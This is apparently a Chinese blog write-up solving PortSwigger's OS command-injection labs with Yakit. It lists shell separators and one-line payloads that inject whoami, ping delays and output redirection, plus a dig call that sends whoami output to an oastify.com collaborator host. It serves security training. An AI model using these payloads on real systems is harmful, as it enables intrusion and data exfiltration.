Yakit打BurpSuite靶场—命令注入篇
; 顺序执行命令,无论前一个命令是否成功。
& 将命令放入后台执行,不阻塞当前 Shell。
&& 前一条命令成功(退出码 0)才执行后续命令。
|| 前一条命令失败(退出码非 0)才执行后续命令。
| 将前一个命令的输出作为后一个命令的输入。
Lab 1
OS command injection, simple case
1
storeId=1;whoami
或
1
storeId=1|whoami
Lab 2
Blind OS command injection with time delays
1
email=q%40q.com||ping -c 10 127.0.0.1||
或
1
email=q%40q.com||ping -c 10 127.0.0.1;
Lab 3
Blind OS command injection with output redirection
1
email=q%40q.com||whoami>/var/www/images/yak.txt||
Lab 4
Blind OS command injection with out-of-band interaction
1
email=q%40q.com||dig `whoami`.example.oastify.com||
Lab 5
Blind OS command injection with out-of-band data exfiltratio
1
email=q%40q.com||dig `whoami`.example.oastify.com||
本文由作者按照
CC BY 4.0
进行授权